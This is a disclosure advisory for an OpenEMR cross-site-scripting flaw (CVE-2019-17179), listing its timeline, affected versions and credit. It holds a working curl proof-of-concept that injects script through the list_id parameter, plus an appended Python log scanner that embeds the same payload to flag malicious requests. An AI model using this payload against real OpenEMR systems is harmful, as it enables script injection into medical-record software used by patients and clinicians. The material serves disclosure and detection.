CVE-2019-17179
XSS in library/custom_template/add_template.php in OpenEMR before 5.0.2.1 allows a malicious user to execute code in the context of a victim's browser via a crafted list_id query parameter.
Timeline
- Discovered: October 1, 2019
- Pull Request Issued: October 1, 2019
- Reported: October 2, 2019
- OpenEMR Merged Pull Request: October 2, 2019
- CVE ID issued: October 4, 2019
- OpenEMR Release: October 10, 2019 (5.0.2.1)
Version Details
Fixed-In Version: 5.0.2.1
Affected Versions:
- 4.1.0
- 4.1.1
- 4.1.2
- 4.1.2.3
- 4.1.2.6
- 4.1.2.7
- 4.2.0
- 4.2.1
- 4.2.2
- 5.0.0
- 5.0.0.5
- 5.0.0.6
- 5.0.1
- 5.0.1.1
- 5.0.1.2
- 5.0.1.3
- 5.0.1.4
- 5.0.1.5
- 5.0.1.6
- 5.0.1.7
- 5.0.2
Credit
Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)
References
POC Exploit
Assuming OpenEMR is running on localhost:
curl "http://localhost/openemr/library/custom_template/add_template.php?list_id=1}});}}};alert(%27xss%27);function%20derp(){if%20(true){if(true){%20$.ajax({type:%22POST%22,data:{tempateid:%201"
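Detection-side check for the request above, as an added example (not part of the original advisory and not OpenEMR code): it scans access-log lines for requests to add_template.php whose list_id is not a plain integer. It assumes list_id is normally a numeric identifier and that logs use the common/combined format; the sample log lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Script path and parameter named in the advisory.
TARGET = "/library/custom_template/add_template.php"
PARAM = "list_id"

# Request line inside a common/combined-format access-log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# Assumption: a legitimate list_id is a plain decimal integer.
NUMERIC_RE = re.compile(r"[0-9]+")

# Query value from the advisory's PoC, still percent-encoded as it would be logged.
POC_VALUE = ("1}});}}};alert(%27xss%27);function%20derp(){if%20(true){if(true){"
             "%20$.ajax({type:%22POST%22,data:{tempateid:%201")

# Constructed sample log lines (addresses, times and sizes are made up).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Oct/2019:10:00:00 +0000] "GET /openemr' + TARGET
    + '?list_id=12 HTTP/1.1" 200 2048',
    '127.0.0.1 - - [01/Oct/2019:10:00:05 +0000] "GET /openemr' + TARGET
    + '?list_id=' + POC_VALUE + ' HTTP/1.1" 200 2301',
    '127.0.0.1 - - [01/Oct/2019:10:00:09 +0000] "GET /openemr/other.php'
    '?list_id=abc HTTP/1.1" 200 512',
]

def param_values(url):
    """Return decoded list_id values if the URL targets the affected script."""
    parts = urlsplit(url)
    if not unquote(parts.path).endswith(TARGET):
        return []
    values = []
    # Split on '&' only: the value itself may contain ';' and other punctuation.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == PARAM:
            values.append(unquote_plus(value))
    return values

def flag_requests(lines):
    """Return (line_number, decoded_value) for every non-numeric list_id."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits += [(number, v) for v in param_values(match.group(1))
                 if not NUMERIC_RE.fullmatch(v)]
    return hits
```

Filtering on angle brackets or script tags would miss this request: the value contains neither, so the check validates the expected type of list_id instead.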